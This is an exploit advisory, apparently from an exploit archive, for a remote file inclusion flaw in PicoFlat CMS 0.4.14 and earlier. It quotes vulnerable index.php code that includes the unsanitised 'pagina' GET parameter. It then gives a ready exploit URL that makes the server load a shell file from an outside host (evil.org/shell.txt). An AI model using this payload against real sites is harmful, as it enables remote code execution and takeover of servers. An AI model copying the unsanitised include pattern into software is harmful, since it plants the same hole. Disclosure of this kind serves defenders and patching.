id: 2219
date: 10/10/2007
title: PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability
author: 0in
cves: 

====================================================================
PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability
====================================================================



#PicoFlat CMS Remote file inclusion
#f0und bY 0in
#download:http://sourceforge.net/project/showfiles.php?group_id=195156&package_id=230351&release_id=533796
#Greetings to:Dark-coders team members: Die-angel,Slim,Umbro
#Others: Joker186,Kaja,Wojto111,Rade0n
#And funny n00b-firends: Pucik and Steryd ;]
FUN BUG in index.php:
83: if (isset($_GET['pagina'])) { $pagina = $_GET['pagina']; }else{ $pagina = "news_publisher.php"; }

107:   <?php  include $pagina; ?>

EXPLOIT:
http://x.com/index.php?pagina=http://evil.org/shell.txt?



#  0day.today [2023-03-23]  #